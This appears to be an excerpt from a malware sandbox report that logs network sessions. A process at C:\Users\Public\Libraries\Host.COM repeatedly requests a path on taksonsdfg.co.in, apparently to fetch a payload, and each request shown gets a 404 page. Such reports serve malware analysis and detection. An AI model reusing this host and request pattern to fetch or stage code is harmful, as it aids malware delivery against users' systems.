                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:22 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.2.449973108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:23 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:24 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:23 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:24 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:24 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    58192.168.2.449980108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:24 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:25 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:25 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:25 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:25 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    59192.168.2.449989108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:25 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:26 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:26 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:26 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:26 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    60192.168.2.449999108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:26 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:27 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:27 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:27 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:27 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    61192.168.2.450006108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:28 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:28 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:28 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:28 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:28 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    62192.168.2.450017108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:29 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:29 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:29 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:29 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:29 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    63192.168.2.450024108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:30 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:30 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:30 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:30 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:30 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
